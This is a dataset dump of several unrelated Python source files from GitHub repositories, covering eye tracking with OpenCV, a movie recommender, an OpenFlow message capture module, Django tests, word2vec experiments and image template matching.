global\n COUNTER += 1\n if COUNTER % 10 != 0: return\n if et_data.gaze is not None:\n xvec, yvec, zvec, vergence = et_data.gaze\n # print(f'Gaze={xvec:.2f},y={yvec:.2f},z={zvec:.2f},vergence={vergence:.2f}')\n\n\n @staticmethod\n def _handle_events(event_type, timestamp, *args):\n if event_type == adhawkapi.Events.BLINK:\n duration = args[0]\n #print(f'Got blink: {timestamp} {duration}')\n\n def _handle_tracker_connect(self):\n print(\"Tracker connected\")\n self._api.set_et_stream_rate(60, callback=lambda *args: None)\n self._api.set_et_stream_control([\n adhawkapi.EyeTrackingStreamTypes.GAZE,\n adhawkapi.EyeTrackingStreamTypes.EYE_CENTER,\n adhawkapi.EyeTrackingStreamTypes.PUPIL_DIAMETER,\n adhawkapi.EyeTrackingStreamTypes.IMU_QUATERNION,\n ], True, callback=lambda *args: None)\n self._api.set_event_control(adhawkapi.EventControlBit.BLINK, 1, callback=lambda *args: None)\n self._api.set_event_control(adhawkapi.EventControlBit.EYE_CLOSE_OPEN, 1, callback=lambda *args: None)\n\n def _handle_tracker_disconnect(self):\n print(\"Tracker disconnected\")\n\ndef clamp(_min, _max, val):\n if val < _min:\n return _min\n if val > _max:\n return _max\n if math.isnan(val):\n return 0\n else:\n return val\n\ndef transform_gaze_to_screen_space(gaze_point, src_points, dst_points):\n src_points = np.array(src_points, dtype=np.float32)\n dst_points = np.array(dst_points, dtype=np.float32)\n \n M = cv2.getPerspectiveTransform(src_points, dst_points)\n \n # Ensure gaze_point is a Nx1x2 array\n gaze_points_array = np.array([gaze_point], dtype=np.float32).reshape(-1, 1, 2)\n \n transformed_points = cv2.perspectiveTransform(gaze_points_array, M)\n return tuple(map(int, transformed_points[0][0]))\n\n\n# HSV_RANGE = [np.array((60, 0, 0)), np.array((85, 100, 100))] # green\nHSV_RANGE = [np.array((135, 100, 200)), np.array((155, 160, 255))] # magenta\nC_LIMIT = 10\nEYE_SMOOTHER = SmoothEyeTracker(0.5, 0.2)\n\n\n# def run_gestures():\n# global minecraft_controller, active_mode, websurfing_controller\n# cap = cv2.VideoCapture(0)\n# while True:\n# ret, frame = cap.read()\n# if not ret:\n# print(\"Failed to grab frame\")\n# break\n\n# if active_mode == 'minecraft':\n# minecraft_controller(frame, active_mode)\n# elif active_mode == 'web':\n# websurfing_controller(frame, active_mode)\n\n# # Display the frame (you can add conditions to display based on the mode)\n# cv2.imshow(\"Controller\", frame)\n\n# if cv2.waitKey(1) & 0xFF == ord('q'):\n# break\n\n# cap.release()\n# cv2.destroyAllWindows()\n\n\n\n\ndef main():\n ''' App entrypoint '''\n global xvec, yvec # Declare these as global\n global minecraft_controller, active_mode, websurfing_controller\n\n frontend = FrontendData()\n # create an opencv camera instance\n cap = cv2.VideoCapture(0)\n\n\n # check if camera is opened\n if not cap.isOpened():\n print(\"Cannot open camera\")\n exit()\n \n #screen_present = False\n try:\n \n # run the opencv code\n while True:\n # read frame from camera\n ret, frame = cap.read()\n\n if active_mode == 'minecraft':\n minecraft_controller(frame, active_mode)\n elif active_mode == 'web':\n websurfing_controller(frame, active_mode)\n\n # check if frame is read correctly\n if not ret:\n print(\"Can't receive frame (stream end?). Exiting ...\")\n break\n # Get dimensions\n h, w, c = frame.shape\n\n # For demonstration: create a point from gaze vector\n xc = (clamp(-3, 3, xvec) + 3) / 6 * w\n x_point = int(clamp(-10000, 10000, xc + (75 + xc/80)))\n y_point = h - int((clamp(-2, 2, yvec) + 2) / 4 * h)\n # -- \n # get hsv image\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n # filter out colours within a range\n mask = cv2.inRange(hsv, HSV_RANGE[0], HSV_RANGE[1])\n result = cv2.bitwise_and(frame, frame, mask=mask)\n # # convert result to black and white\n resultbw = cv2.cvtColor(result, cv2.COLOR_BGR2GRAY)\n\n\n coords = []\n # draw rectangles around each contour\n contours, hierarchy = cv2.findContours(resultbw, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n if w*h > C_LIMIT:\n coords.append((x, y))\n cv2.rectangle(result, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n # sort coords by x, then by y\n coords = sorted(coords, key=lambda x: (x[0]))\n # draw coords to result (lines)\n\n #screen_present = False # Reset the screen presence flag at the beginning of every iteration\n\n if len(coords) >= 4:\n topleft = max(coords[:2], key=lambda x: x[1])\n botleft = min(coords[:2], key=lambda x: x[1])\n topright = max(coords[2:], key=lambda x: x[1])\n botright = min(coords[2:], key=lambda x: x[1])\n # print(topleft, botleft, topright, botright, coords)\n cv2.line(frame, topleft, botleft, (0, 0, 255), 2)\n cv2.line(frame, topright, botright, (0, 0, 255), 2)\n cv2.line(frame, topleft, topright, (0, 0, 255), 2)\n cv2.line(frame, botleft, botright, (0, 0, 255), 2)\n\n #screen_present = True\n #---------\n\n # diagonal line\n cv2.line(result, botleft, topright, (0, 255, 0), 2)\n d_length = np.sqrt((botleft[0] - topright[0])**2 + (botleft[1] - topright[1])**2) # pixels\n scale_factor = COMPUTER_CSECTION / d_length # meters/pixels\n\n src_points = [topleft, botleft, topright, botright]\n dst_points = [(0, 0), (0, wmain.height), (wmain.width, 0), (wmain.width, wmain.height)]\n\n transformed_gaze_point = transform_gaze_to_screen_space((x_point, y_point), src_points, dst_points)\n\n # Draw a circle on the gaze point\n cv2.circle(frame, transformed_gaze_point, 5, (255, 255, 255), -1)\n\n # # print(xvec, yvec, zvec)\n # if math.isnan(xvec): xvec = 0\n # if math.isnan(yvec): yvec = 0\n\n # rx = int(xvec/3 * wm.width / 2) + 1920//2\n # ry = 1080//2 - int(yvec/1.8 * wm.height)\n\n # # what is width of the moinitor?\n # mw = topright[0] - botleft[0]\n # mh = -botright[1] + topleft[1]\n # if mw < 0: mw = 1\n # if mh < 0: mh = 1\n\n # find center\n\n # assume max left = -2.5, max right = 2.5\n # max bot = -1.8, max top = 1.8\n # then remap inputs relative to scale\n # sx, sy = (xvec+2.5)/5, (yvec+1.8)/3.6\n # # finding the final coords\n # ex, ey = int(sx * mw + topleft[0]), int(sy * mh + topleft[1]) - mh//2\n # fx, fy = map(int, EYE_SMOOTHER.next_pos(ex, ey))\n\n # # ratio for real screen coords\n # rx, ry = fx / (mw if mw > 1 else 1), fy / (mh if mh > 1 else 1)\n # mag = math.sqrt(xvec**2 + yvec**2)\n # if mag <= 0: mag = 1\n # MS = 30\n # drx, dry = xvec / mag * MS, yvec / mag * MS\n \n # # move to screen coords\n # px, py = pyautogui.position()\n # MOUSE.move(drx, -dry)\n # print(xvec, yvec, drx, dry)\n\n # cv2.circle(frame, (fx, fy), 5, (0, 255, 0), -1)\n\n else:\n pass\n\n # cv2.imshow('result', result)\n cv2.imshow('frame', frame)\n\n # wait for key press\n if cv2.waitKey(1) == ord('q'):\n break\n\n except (KeyboardInterrupt, SystemExit) as e:\n print(e)\n frontend.shutdown()\n cap.release()\n cv2.destroyAllWindows()\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print(exc_type, fname, exc_tb.tb_lineno)\n except Exception as e:\n print(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print(exc_type, fname, exc_tb.tb_lineno)\n\n\n\n\nif __name__ == '__main__':\n wmain = get_monitors()[0]\n app = QApplication(sys.argv)\n \n # Create 4 small windows with different titles and positions\n window1 = SmallWindow(\"Window 1\", 0, 0)\n window2 = SmallWindow(\"Window 2\", 0, wmain.height-40)\n window3 = SmallWindow(\"Window 3\", wmain.width - 40, 0)\n window4 = SmallWindow(\"Window 4\", wmain.width - 40, wmain.height - 40)\n\n # Show all the windows\n window1.show()\n window2.show()\n window3.show()\n window4.show()\n main()\n\n\n\n\n\n","repo_name":"Xrizh/myEye","sub_path":"gesture.py","file_name":"gesture.py","file_ext":"py","file_size_in_byte":12765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17118774678","text":"# (1) when the argument is a numpy array, np.sum ultimately calls add.reduce to do the work.\n# The overhead of handling its argument and dispatching to add.reduce is why np.sum is slower.\n\nimport time\n\nimport numpy as np\nimport pandas\nimport scipy.stats.stats as pearsonr\nimport buildUserWeightMatrix # C'ye compile ettiğimiz dosyayı import ediyoruz\n\nknn = 50\nstartTime = time.time()\n\ncolumnNames = ['movieID', 'userID', 'rating']\n\ntrainData = pandas.read_csv('TrainingRatings.txt', names=columnNames,\n\t\t\t\t\t\t\tdtype={'movieID': np.str, 'userID': np.str, 'rating': np.float})\n\n# gets first column for movie ids and second for user ids\nlistOfMovieIDs = trainData.movieID.tolist()\nlistOfUserIDs = trainData.userID.tolist()\n\n# unique movie IDs\n# pandas.unique is faster then numpy.unique and return_index= true by default\nuniqueListOfMovieIds = pandas.unique(listOfMovieIDs)\nnumberOfMovies = uniqueListOfMovieIds.size\ntempMovieEnum = dict(enumerate(uniqueListOfMovieIds))\nmovieEnum = {v: k for k, v in\n tempMovieEnum.items()} # inverse tempMovieEnum because enumerate does not return ordered way\n\n# unique user IDs\nuniqueListOfUserIDs = pandas.unique(listOfUserIDs)\nnumberOfUsers = uniqueListOfUserIDs.size\ntempUserEnum = dict(enumerate(uniqueListOfUserIDs))\nuserEnum = {v: k for k, v in tempUserEnum.items()} #inverse tempUserEnum because enumerate does not return ordered way\n\n# movie X user matrix\nmovieUserRatingMatrix = np.empty(shape=(numberOfMovies, numberOfUsers), dtype=np.float)\n\n# user X user weight matrix (r)\nuserWeightMatrix = np.empty(shape=(numberOfUsers, numberOfUsers), dtype=float)\n\n############################################## FUNCTIONS DEFINITIONS #############################################\n\ndef buildMovieUserRatingMatrix( data ):\n\tfor index, row in data.iterrows():\n\t\tmovieIndex = movieEnum[row['movieID']]\n\t\tuserIndex = userEnum[row['userID']]\n\t\tmovieUserRatingMatrix[movieIndex][userIndex] = row['rating']\n\n\treturn\n\n# returns root mean square error value\ndef rmse(predictions, targets):\n\treturn np.sqrt(((predictions - targets) ** 2).mean())\n\n\ndef getMeanRating(ratings):\n\n\tratingArr = []\n\n\tfor r in range(0,len(ratings)):\n\t\tif r > 0:\n\t\t\tratingArr.append(r)\n\n\treturn np.asarray(ratingArr).mean()\n\n# Predict rating for user , for movie \ndef predictAndCompareUserRating(testData,weightMatrix,knn):\n\n\tpredictedMovies = np.zeros([len(testData)], dtype=[('movieID', '|S10'), ('userID', '|S10'), ('predictedRating', 'f4')])\n\tpredictionCounter = 0\n\trecommendations = np.zeros([numberOfMovies], dtype=[('movieID', '|S10'), ('userID', '|S10')])\n\trecommendationCounter = 0\n\tmaeValue = 0\n\n\trmsePredictions = []\n\trmseExpecteds = []\n\n\tfor index, row in testData.iterrows():\n\t\t# test dosyasından satır okunuyor\n\t\tmovieID = row['movieID']\n\t\tmovieIndex = movieEnum[movieID]\n\t\tuserID = row['userID']\n\t\tuserIndex = userEnum[userID]\n\t\texpectedRating = row['rating']\n\n\t\tmeanRatingOfActiveUser = getMeanRating(movieUserRatingMatrix[:,userIndex])\n\n\t\tnumerator = 0\n\t\tdenumerator = 0\n\n\t\tif userIndex < 100:\n\t\t\t# diğer userlar ile olan ağırlıkları büyükten küçüğe sıralarnı ve knn kadar user alınır\n\t\t\tsortedMostSimilarUsers = np.argsort(weightMatrix[userIndex][:])[::-1][:knn]\n\n\t\t\tfor similarUserIndex in range(0, knn):\n\t\t\t\t#benzer kullanıcı indexini al\n\t\t\t\tsimilarUserIndex = sortedMostSimilarUsers[similarUserIndex]\n\n\t\t\t\t#benzer kullanıcının verdiği oyların ortalaması\n\t\t\t\tmeanRatingOfSimilarUser = getMeanRating(movieUserRatingMatrix[:, similarUserIndex])\n\t\t\t\t#benzer kullanıcının movieID idli filme verdiği oy\n\t\t\t\tsimilarUserRatingForMovie = movieUserRatingMatrix[movieIndex][similarUserIndex]\n\n\t\t\t\tnumerator += (similarUserRatingForMovie - meanRatingOfSimilarUser) * weightMatrix[userIndex][\n\t\t\t\t\tsimilarUserIndex]\n\t\t\t\tdenumerator += weightMatrix[userIndex][similarUserIndex]\n\n\t\t\tpredictedRating = meanRatingOfActiveUser + numerator / denumerator\n\t\t\tpredictedMovies[predictionCounter] = ((str(movieID), str(userID), predictedRating))\n\t\t\tpredictionCounter += 1\n\t\t\tmaeValue += abs(predictedRating - expectedRating) # farkın mutlak değeri\n\t\t\t# rmse hesaplaması için değerler dizilere ekleniyor\n\t\t\trmsePredictions.append(predictedRating)\n\t\t\trmseExpecteds.append(expectedRating)\n\n\t\t\t# film tahminleme\n\t\t\tif predictedRating > 4:\n\t\t\t\trecommendations[recommendationCounter] = (str(movieID), str(userID))\n\t\t\t\trecommendationCounter += 1\n\n\n\tnp.savetxt('PredictRatings.txt', predictedMovies,delimiter=',',newline='\\n', fmt='%s,%s,%f')\n\tnp.savetxt('RecommendMovie.txt', recommendations, delimiter=',',newline='\\n', fmt='%s,%s')\n\tprint(\"MAE : \" + str(maeValue/predictionCounter))\n\tprint(\"RMSE : \" + str(rmse(np.asarray(rmsePredictions),np.asarray(rmseExpecteds))))\n\treturn\n\n############################################ END OF FUNCTIONS DEFINITIONS ########################################\n\n# kullanıcılar tarafından herbir filme verilen puanlar tutuluyor\nbuildMovieUserRatingMatrix(trainData)\nprint(\"Movie-user matrix build time is %s\" % (time.time() - startTime))\n\n# kullanıcılar arasındaki ağırlık matrisi oluşturulur\n# C ye çevrilerek programın hızlandırılması amaçlanmıştır\nweightMatrix = buildUserWeightMatrix.buildWeightMatrixBetweenUsers(movieUserRatingMatrix,numberOfUsers)\n#print(weightMatrix[0:10, 0:10])\nprint(\"Execution time: %s seconds.\" % (time.time() - startTime))\n\n\n# read testRatings\ntestData = pandas.read_csv('TestingRatings.txt', names=columnNames, dtype={'movieID': np.str, 'userID': np.str, 'rating': np.float})\n#print(len(testData))\npredictAndCompareUserRating(testData,weightMatrix,knn)\n# program execution time takes about 55 hours","repo_name":"fukit0/NetflixRecommenderSystem","sub_path":"RecommenderSystem.py","file_name":"RecommenderSystem.py","file_ext":"py","file_size_in_byte":5650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5514227702","text":"\"\"\"\nCapture App\n\"\"\"\n\nimport pickle\n\nfrom pyof.foundation.basic_types import DPID\nfrom pyof.v0x04.common.header import Type\nfrom pyof.v0x04.controller2switch.common import MultipartType\n\nfrom proxy.observer import OFObserver\nfrom capture.of_msg_repository import packet_in_out_repo\nfrom ofproto.packet import OFMsg\nfrom ofproto.datapath import Port, Datapath\nfrom ofproto.packet import todict\n\nimport web.proto.api_pb2 as pb\nfrom web.ws_server import emit_ofmsg, set_getOpenFlowMessage_handler\n\n\nclass CaptureBase(OFObserver):\n \"\"\"CaptureBase\n\n This is a base class for saving messages to a repository or output to stdout.\n \"\"\"\n\n def __init__(self, observable, do_capture=True):\n super(CaptureBase, self).__init__(observable)\n # local port to datapath id mapping\n self.lport_to_dpid = {}\n # local port to port obj mapping\n self.lport_to_port = {}\n\n # all captured messages\n self._messages = []\n self.do_capture = do_capture\n\n # datapathes\n self._datapathes: list[Datapath] = []\n \n # handlers\n self.handlers = {}\n\n def update(self, msg):\n \"\"\"handle msg\n\n * this method called by observable\n\n Args:\n msg (OFMsg) : openflow message object\n \"\"\"\n # datapthes\n datapath = self._get_datapath(msg.local_port)\n if datapath is None:\n datapath = Datapath()\n datapath.local_port = msg.local_port\n self._datapathes.append(datapath)\n\n # set datapathid\n if msg.message_type == Type.OFPT_FEATURES_REPLY:\n # set datapath id\n if isinstance(msg.of_msg.datapath_id, DPID):\n datapath_id = int(''.join(msg.of_msg.datapath_id.value.split(':')), 16)\n self.lport_to_dpid[msg.local_port] = datapath_id\n datapath.datapath_id = datapath_id\n \n # set port obj\n elif msg.message_type == Type.OFPT_MULTIPART_REPLY:\n if msg.of_msg.multipart_type == MultipartType.OFPMP_PORT_DESC:\n # Note: OFPMP_PORT_DESC message body is a list of port\n port_list = []\n for p in msg.of_msg.body:\n port_list.append(Port.from_dict(todict(p)))\n self.lport_to_port[msg.local_port] = port_list\n datapath.ports = port_list\n\n # update msg datapath id (before FeaturesReply)\n if msg.local_port in self.lport_to_dpid.keys():\n msg.datapath_id = self.lport_to_dpid[msg.local_port]\n\n if self.do_capture:\n self._messages.append(msg)\n\n # notify subclass\n self.msg_handler(msg)\n\n def msg_handler(self, msg):\n if msg.message_type in self.handlers.keys():\n self.handlers[msg.message_type](msg)\n if \"*\" in self.handlers.keys():\n self.handlers[\"*\"](msg)\n\n def get_datapathid(self, local_port):\n \"\"\"get datapath id\n\n Args:\n local_port (int) : local port\n\n Returns:\n int or None : datapath id\n \"\"\"\n if local_port in self.lport_to_dpid.keys():\n return self.lport_to_dpid[local_port]\n else:\n return None\n\n def _get_datapath(self, local_port: int):\n datapath = None\n for d in self._datapathes:\n if d.local_port == local_port:\n datapath = d\n break\n return datapath\n\n def get_port(self, datapath_id):\n \"\"\"get local port of datapath\n\n Args:\n datapath_id (int or string) : Datapath ID that can be converted to int.\n\n Returns:\n int or None : local port\n \"\"\"\n if not isinstance(datapath_id, int):\n datapath_id = int(datapath_id)\n for p, d in self.lport_to_dpid.items():\n if d == datapath_id:\n return p\n return None\n\n def get_port_name(self, local_port, port_no):\n \"\"\"get port name from port number\n \"\"\"\n for port in self.lport_to_port[local_port]:\n if int(port_no) == port_no:\n return port.name\n return None\n\n def __str__(self):\n msgs = \"\"\n for msg in self._messages:\n datapathid = self.get_datapathid(msg.local_port)\n order = \"switch(dpid={}) -> controller\".format(datapathid)\n if not msg.switch2controller:\n order = \"controller -> switch(dpid={})\".format(datapathid)\n msg_name = \"{}(xid={})\".format(msg.msg_name, msg.xid)\n\n msgs += \"{} {} {} \\n\".format(msg.datetime, order, msg_name)\n return msgs\n\n\nclass SimpleCapture(CaptureBase):\n\n def __init__(self, observable):\n super(SimpleCapture, self).__init__(observable)\n\n\nclass CaptureWithRepo(CaptureBase):\n \"\"\"\n\n Todo:\n * to get ofport from phy_port\n \"\"\"\n\n def __init__(self, observable):\n super(CaptureWithRepo, self).__init__(observable)\n self.repo = packet_in_out_repo\n\n def msg_handler(self, msg):\n super(CaptureWithRepo, self).msg_handler(msg)\n self.add_repo(msg)\n\n def add_repo(self, msg):\n if msg.message_type == Type.OFPT_PACKET_OUT:\n self.logger.debug(\"add repo {}\".format(msg))\n self.repo.add(msg)\n elif msg.message_type == Type.OFPT_PACKET_IN:\n self.logger.debug(\"add repo {}\".format(msg))\n self.repo.add(msg)\n\n def get_packet_in_out_repo(self):\n return self.repo\n\n\nclass CaptureWithPipe(CaptureBase):\n \"\"\"\n\n Todo:\n * to get ofport from phy_port\n \"\"\"\n\n def __init__(self, observable, parent_conn=None):\n super(CaptureWithPipe, self).__init__(observable)\n self.parent_conn = parent_conn\n self._send_types = [Type.OFPT_PACKET_OUT, Type.OFPT_PACKET_IN, Type.OFPT_FLOW_MOD]\n\n def msg_handler(self, msg):\n super(CaptureWithPipe, self).msg_handler(msg)\n self.send_pipe(msg)\n\n def send_pipe(self, msg):\n if self.parent_conn:\n if msg.message_type in self._send_types:\n # pre-pickle to avoid error\n msg.of_msg = msg.of_msg.pack()\n msg = pickle.dumps(msg)\n self.parent_conn.send_bytes(msg)\n\n def get_packet_in_out_repo(self):\n return packet_in_out_repo\n\n\nclass CaptureWithWeb(CaptureBase):\n \"\"\"\n Capture With Web\n \"\"\"\n\n def __init__(self, observable):\n super(CaptureWithWeb, self).__init__(observable, do_capture=True)\n # protobuf messages\n self.messages = []\n\n set_getOpenFlowMessage_handler(self._get_ofmsgs)\n\n def msg_handler(self, msg):\n super(CaptureWithWeb, self).msg_handler(msg)\n proto_datapath = pb.Datapath()\n proto_datapath.local_port = str(msg.local_port)\n dpid = self.get_datapathid(msg.local_port)\n if dpid:\n proto_datapath.id = str(dpid)\n else:\n proto_datapath.id = \"\"\n proto_OFMsg = pb.OpenFlowMessage()\n proto_OFMsg.datapath.local_port = proto_datapath.local_port\n proto_OFMsg.datapath.id = proto_datapath.id\n proto_OFMsg.xid = int(msg.of_msg.header.xid)\n proto_OFMsg.message_type = msg.msg_name\n proto_OFMsg.timestamp = msg.timestamp\n proto_OFMsg.switch2controller = msg.switch2controller\n proto_OFMsg.content = str(todict(msg.of_msg))\n self.messages.append(proto_OFMsg)\n emit_ofmsg(proto_OFMsg.SerializeToString())\n\n def _get_ofmsgs(self, _request):\n ofmsgs = pb.OpenFlowMessages()\n for m in self.messages:\n ofmsgs.messages.append(m)\n self.messages = []\n return ofmsgs.SerializeToString()\n\n","repo_name":"shu1r0/ofcapture","sub_path":"capture/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":7695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"7623077373","text":"def check(n):\n s=n//k\n if s*k==n:\n return True\n return False\nl,r,k =map(int,input().split())\nc=0\nfor i in range(l,r+1):\n if(check(i)):\n c+=1\nprint(c)\n","repo_name":"Happy-76/codemind-python","sub_path":"Count_Divisors.py","file_name":"Count_Divisors.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"35198183913","text":"\ndef copiar_sin_repetidos(self):\n #Genero una instancia de la lista\n copia = LinkedList()\n #Verifico si la lista es vacia caso contrario retorno una lista vacia\n if self.__first != None:\n lista = [self.__first.value]\n #Inicializo la lista a retornar con el primer valor\n copia._first = LinkedList.Node(self._first.value)\n p = self.__first.next_node\n q = copia.__first\n copia.__len += 1\n #mientras no finalice la lista original\n while p != None:\n #Reviso si ya existe en la lista original-caso verdadero avanzo al siguiente nodo\n if p.value in lista:\n p = p.next_node\n else:\n #No se encuentra en la lista repetido y lo copio y aumento el tamañod e la lista\n q.next_node = LinkedList.Node(p.value)\n q = q.next_node\n copia.__len += 1\n lista.append(p.value)\n copia.__last = q\n return copia","repo_name":"pablolupo84/ListasEnlzadas","sub_path":"Ejemplos/Test_2/clases.py","file_name":"clases.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40919539527","text":"from datetime import date\n\nfrom django.test import TestCase\nfrom blog.models import Post, Tag\nfrom . import predefined_dataclasses as pred_dc\n\nclass PostTestCase(TestCase):\n fixtures = [\"post_fixtures.json\"]\n\n def setUp(self):\n self.test_post_1 = pred_dc.PostDataClass(\n title = \"Test Post Title\",\n subtitle = \"Test Post Subtitle\",\n body = \"#Header 1\",\n created_at = date(2021, 1, 1),\n updated_at = date(2021, 1, 1)\n )\n\n self.test_post_2 = pred_dc.PostDataClass(\n title = \"Test Post Title 2\",\n subtitle = \"Test Post Subtitle 2\",\n body = \"#Header 1\",\n created_at = date(2021, 1, 2),\n updated_at = date(2021, 1, 3)\n )\n\n def test_post_1_has_appropriate_properties(self):\n test_post = Post.objects.get(\n title = self.test_post_1.title,\n subtitle = self.test_post_1.subtitle,\n body = self.test_post_1.body,\n )\n\n self.assertIsNotNone(test_post.uuid)\n self.assertEqual(test_post.title, self.test_post_1.title)\n self.assertEqual(test_post.subtitle, self.test_post_1.subtitle)\n self.assertEqual(test_post.body, self.test_post_1.body)\n self.assertEqual(test_post.created_at,\n self.test_post_1.created_at)\n self.assertEqual(test_post.updated_at,\n self.test_post_1.updated_at)\n\n def test_post_2_has_appropriate_properties(self):\n test_post = Post.objects.get(\n title = self.test_post_2.title,\n subtitle = self.test_post_2.subtitle,\n body = self.test_post_2.body,\n )\n\n self.assertIsNotNone(test_post.uuid)\n self.assertEqual(test_post.title, self.test_post_2.title)\n self.assertEqual(test_post.subtitle, self.test_post_2.subtitle)\n self.assertEqual(test_post.body, self.test_post_2.body)\n self.assertEqual(test_post.created_at,\n self.test_post_2.created_at)\n self.assertEqual(test_post.updated_at,\n self.test_post_2.updated_at)\n\n\nclass TagTestCase(TestCase):\n def setUp(self):\n self.test_tag_1 = pred_dc.TagDataClass(\n name='test_tag'\n )\n\n Tag.objects.create(\n name = self.test_tag_1.name\n )\n\n def test_tag_has_appropriate_properties(self):\n test_tag = Tag.objects.get(\n name = self.test_tag_1.name\n )\n\n self.assertEqual(test_tag.name, self.test_tag_1.name)\n self.assertIsNotNone(test_tag.uuid)\n\n","repo_name":"lambrosopos/blog","sub_path":"blog/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31292793491","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author = 'wyx'\n@time = 2018/6/27 17:28\n@annotation = ''\n\"\"\"\nimport os\n\nfrom gensim.models import Word2Vec\nfrom gensim.models.word2vec import LineSentence\nfrom keras import Sequential\nfrom keras.layers import Dense, Dropout\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\n\ncorpus = [\n 'This is the first document.',\n 'This is the second second document.',\n 'And the third one.',\n 'Is this the first document?',\n]\n\nif False:\n vectorizer = CountVectorizer()\n y = vectorizer.fit_transform(corpus)\n # 词序\n print(vectorizer.vocabulary_)\n print()\n feature_name = vectorizer.get_feature_names()\n print(y)\n print(feature_name)\n\n print(len(feature_name))\n print(y.toarray())\n print(y.shape)\nif False:\n q = \"\"\"\n Tifidf\n \"\"\"\n print(q)\n\n tfidf = TfidfVectorizer()\n y = tfidf.fit_transform(corpus)\n # 词序\n print(vectorizer.vocabulary_)\n print()\n feature_name = vectorizer.get_feature_names()\n print(y)\n print(feature_name)\n\n print(len(feature_name))\n print(y.toarray())\n print(y.shape)\n\nif False:\n q = \"\"\"\n Word2Vec 先分词\n \"\"\"\n print(q)\n\n word = [['first', 'sentence'], ['second', 'sentence']]\n model = Word2Vec(word, min_count=1)\n print(model)\n vac = model.vocabulary\n print(vac)\n print(model.corpus_count)\n print(model['first'])\n print(model.most_similar('sentence'))\n\n\n # model = Doc2Vec(corpus,size=50, min_count=2, iter=10)\n # print(model['This'])\n\n def train_word2vec(filename, word2vec_file):\n # 模型文件不存在才处理\n if not os.path.exists(word2vec_file):\n sentences = LineSentence(filename)\n # sg=0 使用cbow训练, sg=1对低频词较为敏感\n model = Word2Vec(sentences,\n size=300, window=5, min_count=2, sg=1, workers=4)\n model.save(word2vec_file)\n\n\n word2vec_file = 'temp/w2v.bin'\n train_word2vec('temp/news_sohusite_cutword.txt', word2vec_file)\n model = Word2Vec.load(word2vec_file)\n print(model.most_similar('健康'))\n print(model.similarity('健康', '血压'))\n print(model.similarity('血压', '健康'))\n print(model.similarity('血压', '血压'))\n print(model.similarity('血压', '牛奶'))\n\n\ndef baseline_model(max_features):\n model = Sequential()\n model.add(Dense(5, input_dim=max_features, activation='relu'))\n model.add(Dropout(0.2))\n model.add(Dense(2, activation='softmax'))\n # Compile model\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n","repo_name":"631068264/learn-sktf","sub_path":"tf_cook/nlp/sk_bag_word.py","file_name":"sk_bag_word.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25723226499","text":"\"\"\"Run time application\"\"\"\n\nfrom common import STORED_PROC_KEY, TEMP_STORED_PROC, SENSOR_ERROR_KEY, SENSOR_LOCATION_KEY, SENSOR_TEMP_KEY, DB_ARGS_KEY\nfrom common.db import DB\nfrom common.exceptions import SetTempError\nfrom common.sensors import Sensors\nfrom common.enums import RequestTypes\n\n\ndef main():\n \"\"\"The main application\"\"\"\n sensor_data = Sensors().temps\n db_conn = DB()\n fails = []\n for data in sensor_data:\n args = {STORED_PROC_KEY: TEMP_STORED_PROC} | {DB_ARGS_KEY: [data[SENSOR_TEMP_KEY], data[SENSOR_ERROR_KEY], data[SENSOR_LOCATION_KEY]]}\n error, resp = db_conn.request(method=RequestTypes.POST, uri=f\"{db_conn.db_host}/{db_conn.call}\", args=args)\n if error:\n fails.append(resp)\n\n if fails:\n raise SetTempError(f\"The following errored when saving to the DB: {fails}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"another-salad/house_temp","sub_path":"scheduler/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3641387720","text":"import cv2 as cv\r\nimport numpy as np\r\n\r\nlamp_img = cv.imread(r'C:\\Users\\User\\Desktop\\Project\\Phyton\\images\\lamp.png', cv.IMREAD_UNCHANGED)\r\nled_img = cv.imread(r'C:\\Users\\User\\Desktop\\Project\\Phyton\\images\\led.png', cv.IMREAD_UNCHANGED)\r\n\r\nresult = cv.matchTemplate(lamp_img, led_img, cv.TM_CCOEFF_NORMED)\r\n\r\n\r\nmin_val, max_val, min_loc, max_loc = cv.minMaxLoc(result)\r\n\r\nprint('Best match top left location: %s' %str(max_loc))\r\nprint('Best match confidence: %s' % max_val)\r\n\r\nthreshold = 0.8\r\nif max_val >= threshold:\r\n print('Found needle.')\r\n\r\n led_w = led_img.shape[1]\r\n led_h = led_img.shape[0]\r\n\r\n top_left = max_loc\r\n bottom_right = (top_left[0] + led_w, top_left[1] + led_h)\r\n\r\n cv.rectangle(lamp_img, top_left, bottom_right, color=(0,0,255), thickness=2, lineType=cv.LINE_4)\r\n\r\n cv.imshow('Result', lamp_img)\r\n cv.waitKey()\r\nelse:\r\n print('Needle not found.')\r\n\r\n\r\n\r\n# cv.imshow('Result', result)\r\n# 